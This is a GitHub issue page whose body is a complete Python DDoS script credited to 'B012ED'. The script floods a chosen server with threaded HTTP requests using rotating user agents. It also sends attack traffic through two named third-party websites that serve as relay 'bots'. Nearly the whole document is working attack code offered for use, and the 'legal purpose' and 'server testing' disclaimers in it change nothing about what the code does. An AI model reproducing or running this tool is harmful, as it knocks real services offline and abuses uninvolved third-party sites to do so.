Skip to content

fix: updated version #1

@0xbitx

Description

@0xbitx
#!/usr/bin/python3
# -*- coding: utf-8 -*-

# python 3 Ddos-Attack Script v.1
# by B012ED
# only for legal purpose

import os,time,sys,shutil,itertools,threading,random
from queue import Queue
from optparse import OptionParser
import time,sys,socket,threading,logging,urllib.request,random

def yusa(s):
    for c in s + '\n':
        sys.stdout.write(c)
        sys.stdout.flush()
        time.sleep(random.random() * 0.01)
yusa('import data from :')
done = False

def animate():
    for c in itertools.cycle(['\033[34;1m|', '/', '-', '\\\033[00m']):
        if done:
            break
        sys.stdout.write('\rloading ' + c)
        sys.stdout.flush()
        time.sleep(0.1)
t = threading.Thread(target=animate)
t.start()

time.sleep(10)
done = True

yusa("\n\033[00m\t\033[41;1m http://b012ed.github.io \033[00m")

yusa("""\033[34;1m
    ┏┓ ┏━┓┏━┓┏━╸╺┳┓Ⓒ
    ┣┻┓┃ ┃┣┳┛┣╸  ┃┃ \033[96;1mDdos\033[00m
 \033[96;1m   ┗━┛┗━┛╹┗╸┗━╸╺┻┛\033[00m
 \033[34;1m   copyright 2021 \033[96;1mV1\033[00m""")
done = False
os.system("date")
print ("\033[1;34m•••••••••••••••••••••••••••••\n")

def user_agent():
	global uagent
	uagent=[]
	uagent.append("Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0) Opera 12.14")
	uagent.append("Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:26.0) Gecko/20100101 Firefox/26.0")
	uagent.append("Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3")
	uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
	uagent.append("Mozilla/5.0 (Windows NT 6.2) AppleWebKit/535.7 (KHTML, like Gecko) Comodo_Dragon/16.1.1.0 Chrome/16.0.912.63 Safari/535.7")
	uagent.append("Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)")
	uagent.append("Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1")
	return(uagent)


def my_bots():
	global bots
	bots=[]
	bots.append("http://essentialtours.com/check?url=")
	bots.append("http://savanacloud.com/")
	return(bots)


def bot_Ddos(url):
	try:
		while True:
			req = urllib.request.urlopen(urllib.request.Request(url,headers={'User-Agent': random.choice(uagent)}))
			print("\033[94mbot is attack...\033[0m")
			time.sleep(.1)
	except:
		time.sleep(.1)


def down_it(item):
	try:
		while True:
			packet = str("GET / HTTP/1.1\nHost: "+host+"\n\n User-Agent: "+random.choice(uagent)+"\n"+data).encode('utf-8')
			s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
			s.connect((host,int(port)))
			if s.sendto( packet, (host, int(port)) ):
				s.shutdown(1)
				print ("\033[97m",time.ctime(time.time()),"\033[0m \033[94m./Ddos-Attack \033[0m")
			else:
				s.shutdown(1)
				print("\033[91m ShutDown\033[0m")
			time.sleep(.1)
	except socket.error as e:
		print("\033[91mNo Connection! ServerDown\033[0m")
		#print("\033[91m",e,"\033[0m")
		time.sleep(.1)


def dos():
	while True:
		item = q.get()
		down_it(item)
		q.task_done()


def dos2():
	while True:
		item=w.get()
		bot_Ddos(random.choice(bots)+"http://"+host)
		w.task_done()


def usage():
	yusa('''\033[1;96m•\033[1;34m DDos-Attack Script v.1 http://b012ed.github.io
\033[1;96m• \033[1;34mDon't abuse All risks are borne by the user.
\033[1;96m• \033[1;34mIt is just for server testing script. Your ip is visible. \n
\033[1;96m•\033[1;34m usage : python3 Ddos.py [-s] [-p] [-t]
   [-h] : help
   [-s] : server ip
   [-p] : port default 80
   [-t] : turbo default 135 \n\033[0m''')
	sys.exit()


def get_parameters():
	global host
	global port
	global thr
	global item
	optp = OptionParser(add_help_option=False,epilog="Ddos")
	optp.add_option("-q","--quiet", help="set logging to ERROR",action="store_const", dest="loglevel",const=logging.ERROR, default=logging.INFO)
	optp.add_option("-s","--server", dest="host",help="attack to server ip -s ip")
	optp.add_option("-p","--port",type="int",dest="port",help="-p 80 default 80")
	optp.add_option("-t","--turbo",type="int",dest="turbo",help="default 135 -t 135")
	optp.add_option("-h","--help",dest="help",action='store_true',help="help you")
	opts, args = optp.parse_args()
	logging.basicConfig(level=opts.loglevel,format='%(levelname)-8s %(message)s')
	if opts.help:
		usage()
	if opts.host is not None:
		host = opts.host
	else:
		usage()
	if opts.port is None:
		port = 80
	else:
		port = opts.port
	if opts.turbo is None:
		thr = 135
	else:
		thr = opts.turbo


# reading headers
global data
headers = open("headers.txt", "r")
data = headers.read()
headers.close()
#task queue are q,w
q = Queue()
w = Queue()


if __name__ == '__main__':
	if len(sys.argv) < 2:
		usage()
	get_parameters()
	print("\033[96m",host," port: ",str(port)," turbo: ",str(thr),"\033[0m\n")
	yusa("\033[94mPlease wait...\033[0m")
	user_agent()
	my_bots()
	time.sleep(5)
	try:
		s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		s.connect((host,int(port)))
		s.settimeout(1)
	except socket.error as e:
		yusa("\033[91mcheck server ip and port\033[0m")
		usage()
	while True:
		for i in range(int(thr)):
			t = threading.Thread(target=dos)
			t.daemon = True  # if thread is exist, it dies
			t.start()
			t2 = threading.Thread(target=dos2)
			t2.daemon = True  # if thread is exist, it dies
			t2.start()
		start = time.time()
		#tasking
		item = 0
		while True:
			if (item>1800): # for no memory crash
				item=0
				time.sleep(.1)
			item = item + 1
			q.put(item)
			w.put(item)
		q.join()
		w.join()

Metadata

Metadata

Assignees

No one assigned

    Labels

    No labels
    No labels

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions